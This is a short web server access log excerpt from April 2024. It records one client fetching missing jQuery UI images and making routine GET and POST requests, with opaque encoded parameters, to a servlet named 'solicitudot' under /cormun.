190.171.142.42 - - [23/Apr/2024:18:48:12 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.142.42 - - [23/Apr/2024:18:48:12 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.142.42 - - [23/Apr/2024:18:48:12 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.142.42 - - [23/Apr/2024:18:49:42 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908757786 HTTP/1.1" 200 4022
190.171.142.42 - - [23/Apr/2024:18:49:42 -0300] "POST /cormun/servlet/solicitudot?6893d0bdb192458285eaa7fd0a23d74c,INS,0,0,false,,gx-no-cache=1713908757976 HTTP/1.1" 200 12654
190.171.142.42 - - [23/Apr/2024:18:49:45 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0580484aa902b1047c2116bbddc17591094e5ead6a38c25940c8bf59d83445866,gx-no-cache=1713908761047 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:51:25 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0b8b2e4b5b70b15dbbb5ae2165775f529558a3482ee62a34f73b3075d9037335594e5ead6a38c25940c8bf59d83445866,gx-no-cache=1713908861257 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:51:25 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0825dcd8634057abfafb7f6aab1102c78,gx-no-cache=1713908861299 HTTP/1.1" 200 29
190.171.142.42 - - [23/Apr/2024:18:51:39 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908875540 HTTP/1.1" 200 255
